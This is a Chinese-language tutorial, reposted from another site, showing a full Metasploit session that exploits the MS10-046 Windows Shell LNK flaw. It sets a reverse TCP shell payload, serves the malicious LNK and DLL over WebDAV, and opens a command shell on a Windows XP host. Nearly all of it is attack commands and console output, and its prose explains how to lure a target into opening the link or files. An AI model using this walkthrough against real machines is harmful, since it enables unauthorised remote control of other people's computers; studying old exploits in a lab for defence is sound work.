Metasploit Framework官网:http://www.metasploit.com
msf > search lnk #查找lnk漏洞利用文件,如果不是最新版请使用svn update更新。
[*] Searching loaded modules for pattern lnk...
Exploits
========
Name Rank Description
---- ---- -----------
windows/browser/ms10_046_shortcut_icon_dllloader excellent Microsoft Windows Shell LNK Code Execution
msf > use windows/browser/ms10_046_shortcut_icon_dllloader #选择漏洞利用文件
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/shell/reverse_tcp #为漏洞加入ShellCode
payload => windows/shell/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.12.110
lhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.12.110
srvhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.12.110 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.12.110 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
msf exploit(ms10_046_shortcut_icon_dllloader) >
[*] Started reverse handler on 192.168.12.110:4444
[*]
[*] Send vulnerable clients to \\192.168.12.110\LjWqptMQY\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*]
[*] Using URL: http://192.168.12.110:80/
[*] Server started.
现在只要在对方浏览器中输入http://192.168.12.110:80或将\\192.168.12.110\LjWqptMQY\下的两个文件放入其他机器中,只需要用资源管理器打开就会访问Shell。
[*] Sending UNC redirect to 192.168.12.110:4611 ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Responding to WebDAV OPTIONS request from 192.168.12.110:4624
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
[*] Sending 301 for /LjWqptMQY ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
[*] Sending directory multistatus for /LjWqptMQY/ ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/desktop.ini
[*] Sending 404 for /LjWqptMQY/desktop.ini ...
[*] Sending LNK file to 192.168.12.110:4624 ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.manifest
[*] Sending 404 for /LjWqptMQY/PUcA.dll.manifest ...
[*] Sending DLL payload 192.168.12.110:4624 ...
[*] Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.123.Manifest
[*] Sending 404 for /LjWqptMQY/PUcA.dll.123.Manifest ...
[*] Sending stage (240 bytes) to 192.168.12.110
[*] Command shell session 1 opened (192.168.12.110:4444 -> 192.168.12.110:4625) at 2010-08-14 10:10:13 +0800
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
C:\Documents and Settings\test\桌面>
Microsoft Windows XP [版本 5.1.2600]
该篇文章转载于www.benkui.com,本文不限制转载.